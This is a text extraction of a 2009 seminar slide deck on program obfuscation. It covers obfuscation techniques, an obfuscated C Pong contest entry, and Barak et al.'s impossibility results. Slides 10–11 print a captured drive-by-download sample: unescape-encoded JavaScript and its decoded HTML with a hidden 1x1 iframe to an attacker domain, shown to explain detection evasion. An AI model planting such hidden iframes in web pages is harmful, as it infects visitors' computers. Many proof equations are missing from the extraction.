Seminar in Cryptographic Protocols: Program Obfuscation Omer Singer June 8, 2009

Seminar in Cryptographic Protocols: Program Obfuscation

  • Upload

  • View

  • Download

Embed Size (px)


Seminar in Cryptographic Protocols: Program Obfuscation. Omer Singer June 8, 2009. Practical Background. What is program obfuscation?. Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do. - PowerPoint PPT Presentation

Citation preview

Page 1: Seminar in Cryptographic Protocols:  Program  Obfuscation

Seminar in Cryptographic Protocols: Program Obfuscation

Omer SingerJune 8, 2009

Page 2: Seminar in Cryptographic Protocols:  Program  Obfuscation

Practical Background

Page 3: Seminar in Cryptographic Protocols:  Program  Obfuscation

What is program obfuscation?

• Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.

• “The art of making things appear more complicated”

Page 4: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

What does this function do?

Page 5: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Three main values:– Potency – Resilience– Cost

• Many methods in use:– Modify variable names and layout– Replace integer values with complex equations– Change program flow– Modify data structures– Anti-disassembly (“armored” viruses)– Anti-debugging

Page 6: Seminar in Cryptographic Protocols:  Program  Obfuscation

And now for some seriously obfuscated programs…

Page 7: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the international C obfuscation contest in 1996

Shows the time on a clock with a configurable face and style

Page 8: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the international C obfuscation contest in 2001

Network-based Pong game

#include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(struct sockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_set I;struct socka\ ddr_in il;struct host\ ent*LI; struct timeval IL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);}

Page 9: Seminar in Cryptographic Protocols:  Program  Obfuscation

No more fun and games…

Page 10: Seminar in Cryptographic Protocols:  Program  Obfuscation

Actual web code blocked by an Intrusion Prevention System at a client:

<Script Language='Javascript'><!--document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E



Page 11: Seminar in Cryptographic Protocols:  Program  Obfuscation

When unobfuscated…

<HTML><HEAD><TITLE></TITLE></HEAD><BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0>

<a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a>

<iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>


Page 12: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 13: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 14: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Obfuscation helps to bypass antivirus, delay security research response

• Obfuscated web code is often the first step in a “drive-by download” attack

• When the web code is executed by the browser it calls programs to target local software

• Result is infection of the user’s computer

Page 15: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 16: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Page 17: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Google Search Results Containing a Harmful URL

Page 18: Seminar in Cryptographic Protocols:  Program  Obfuscation

Attempt to calculate impact of obfuscated online attacks:

1 http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf2 http://viruslist.com/en/analysis?pubid=2047920563 http://www.securityfocus.com/brief/846

74% of malware spread via compromised websites2

80% of browser-based attacks are now obfuscated3

= $7.8 billion

$13.2 billion direct damages of malware1

Page 19: Seminar in Cryptographic Protocols:  Program  Obfuscation

Knowing is half the battle…

A few tips to stop obfuscated “drive-by download” attacks

• Use NoScript to block active content on Firefox

• Don’t click on web ads

• Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

Page 20: Seminar in Cryptographic Protocols:  Program  Obfuscation

Program obfuscation has some positive uses as well!

Page 21: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Preventing source code theft– Disrupt reverse engineering– Block code copying– Especially important with the increased use of Java

and .NET languages such as C# and Visual Basic which do not compile to machine code

– Microsoft recommends obfuscating ASP files in case of server compromise

• Watermarking and Digital Rights Management (DRM)

Page 22: Seminar in Cryptographic Protocols:  Program  Obfuscation

“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.”

- Chris WysopalGood Obfuscation, Bad Code

Page 23: Seminar in Cryptographic Protocols:  Program  Obfuscation


Page 24: Seminar in Cryptographic Protocols:  Program  Obfuscation

Oracle Access

• Used by [B+] to facilitate adversary model• The oracle is some function• Adversary makes query q to the oracle, receives

answer f(q)• Useful when studying obfuscation: oracle serves

as an interface to the program without exposing contents

Page 25: Seminar in Cryptographic Protocols:  Program  Obfuscation

q q

f(q) f(q)Adversary Oracle Program

Adversary with Oracle Access

Page 26: Seminar in Cryptographic Protocols:  Program  Obfuscation

Virtual Black Box

Anything one can efficiently compute from a virtual black box, one should be able to efficiently compute given just oracle access to the program.

In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

Page 27: Seminar in Cryptographic Protocols:  Program  Obfuscation

Speaks Spanish Answers in the form of a question


Tell me about yourself

¿Que quieres saber?

Page 28: Seminar in Cryptographic Protocols:  Program  Obfuscation

Adversary with access to the

virtual black box

Simulator with oracle

access to the function

Page 29: Seminar in Cryptographic Protocols:  Program  Obfuscation


In the [B+] paper on obfuscation, a circuit represents a finite length Turing machine.

Page 30: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Circuits are easier to put in a virtual black box.

• Therefore obfuscating circuits is easier than obfuscating TMs.

• Proofs in the [B+] paper first prove theorems for TM then can easily extend to circuits.

Page 31: Seminar in Cryptographic Protocols:  Program  Obfuscation


• An obfuscator is an algorithm О that will restrict what an adversary can learn about P given O(P).

Page 32: Seminar in Cryptographic Protocols:  Program  Obfuscation

• What is the adversary trying to achieve?– A program that produces the same output as P – A program that produces output with some

relation to the output of P– A function that computes some function of P– Decide some property of P

• The last achievement is the weakest, we want to prove that it is impossible.

Page 33: Seminar in Cryptographic Protocols:  Program  Obfuscation

General Impossibility Proof

Page 34: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

Page 35: Seminar in Cryptographic Protocols:  Program  Obfuscation


For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

Page 36: Seminar in Cryptographic Protocols:  Program  Obfuscation

Polynomial slowdown:

The description length and running time of O(M) are at most polynomially larger than those of M

Page 37: Seminar in Cryptographic Protocols:  Program  Obfuscation

“Virtual black box” property:

For any PPT A, there is a PPT S and a negligible function α such that for all TMs M

Page 38: Seminar in Cryptographic Protocols:  Program  Obfuscation

Circuit Obfuscator

• Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length

• Hence the proposition:

If a TM obfuscator exists, then a circuit obfuscator exists

• Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

Page 39: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensemble

• A family of circuits such that:– Every circuit c in the family is efficient– There exists a predicate π(c) such that• π(c) is hard to compute with oracle access to the

function that c computes• π(c) is easy to compute with access to any circuit c’

that computes the same function as c

Page 40: Seminar in Cryptographic Protocols:  Program  Obfuscation

Main Proof Structure

[B+] structure their Proof the Main Impossibility Result as follows:

1. Define obfuscators that are secure when applied to two programs

2. Show that such obfuscators do not exist3. Modify the construction to prove that TM/circuit

obfuscators do not exist4. Show how this proof yields an unobfuscatable

function ensemble

Page 41: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 42: Seminar in Cryptographic Protocols:  Program  Obfuscation

2-TM Obfuscator

A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.

Page 43: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Formal definition of the strengthened “virtual black box” property:

Adversary with access to two

obfuscated TMs

Simulator with oracle access to

the two TMs

Page 44: Seminar in Cryptographic Protocols:  Program  Obfuscation


According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

Page 45: Seminar in Cryptographic Protocols:  Program  Obfuscation

Proof by contradiction…

• Suppose that there exists a 2-TM obfuscator O.• Consider a function that cannot be learned by oracle queries, for example the following Turing machine:

Page 46: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Define another Turing machine such that:

• Consider an adversary A such that:

A (C,D) = D(C)

Page 47: Seminar in Cryptographic Protocols:  Program  Obfuscation

Then for any α,β:

Page 48: Seminar in Cryptographic Protocols:  Program  Obfuscation

Therefore S with oracle access to and must output 1 and with oracle access to and must output 0…but S cannot differentiate between the two so we have a contradiction.

Page 49: Seminar in Cryptographic Protocols:  Program  Obfuscation

The combination of the these equations contradict the fact that O is a 2-TM obfuscator:

Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that:

Page 50: Seminar in Cryptographic Protocols:  Program  Obfuscation

In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.

Page 51: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

• [B+] extend the two-program obfuscation impossibility result to single program obfuscation.

• The extension is based on the ability to combine functions/TMs

Page 52: Seminar in Cryptographic Protocols:  Program  Obfuscation

In [B+] the combination of two functions is defined as .

A program C is decomposed into by setting .

By this definition, having oracle access to a combined function is the same as having oracle access to

and individually.

Page 53: Seminar in Cryptographic Protocols:  Program  Obfuscation

Theorem: TM obfuscators do not exist.

The adversary A is the same as before only modified to decompose the program that it receives.

Page 54: Seminar in Cryptographic Protocols:  Program  Obfuscation

Suppose for the sake of contradiction that exists TM obfuscator O.

These equations contradict the virtual black-box property required for O being a TM obfuscator.

Page 55: Seminar in Cryptographic Protocols:  Program  Obfuscation

• In [B+] this proof is extended to circuit obfuscators.

• The challenge with extending to circuit obfuscators is greater than expected– Size of the circuit is greater than the input length– Adapt the proof using homomorphic encryption


Page 56: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensembles

• The case against obfuscators is further strengthened by proving the existence of unobfuscatable circuit ensembles.

Page 57: Seminar in Cryptographic Protocols:  Program  Obfuscation

The unobfuscatable circuit ensemble is defined as


Page 58: Seminar in Cryptographic Protocols:  Program  Obfuscation

We can now show that given any circuit that computes the same function as , we can reconstruct the latter.

• Since D’ computes the same function as D and , we have

• We can now reconstruct

Page 59: Seminar in Cryptographic Protocols:  Program  Obfuscation

Indistinguishability Obfuscator• Obfuscation models weaker than the “virtual black

box” may still be useful for software protection

• Indistinguishability obfuscator:Obfuscations of equivalent circuits of the same size

should be computationally indistinguishable.

• Later works have shown this model to be impossible to achieve as well

Page 60: Seminar in Cryptographic Protocols:  Program  Obfuscation

Software Watermarking

We would like to be able to “watermark” a program such that the code will always have a certain identifier that cannot be removed.

Page 61: Seminar in Cryptographic Protocols:  Program  Obfuscation

• A good software watermarking scheme should have the following properties:– Functionality: The marked program computes the same

function as the original program.– Meaningfulness: Most other programs don’t have this

marking.– Fragility: It is infeasible to remove the mark from the

program without (substantially) changing its behavior.

• [B+] sought to formalize the watermarking problem as it relates to obfuscation.

Page 62: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 63: Seminar in Cryptographic Protocols:  Program  Obfuscation

• [B+] sketch a proof showing that no such watermarking scheme exists.

• For any unobfuscatable program, we know that an adversary will be able to take the obfuscated (marked) program and reconstruct the (unmarked) source code.

Page 64: Seminar in Cryptographic Protocols:  Program  Obfuscation


• [B+] have made progress in formalizing the concept of program obfuscation.

• They have shown that the “virtual black box” paradigm is impossible to satisfy.

• Somewhat strong obfuscation of some programs remains a possibility

Page 65: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Program obfuscation has an increasingly important role in the race between hackers and the information security community.

• Additional research must be made in order to increase the effectiveness of malware detection.

• Significant progress in obfuscation techniques may break the current signature-based detection model.

Final Thoughts

Page 66: Seminar in Cryptographic Protocols:  Program  Obfuscation

Thanks for listening!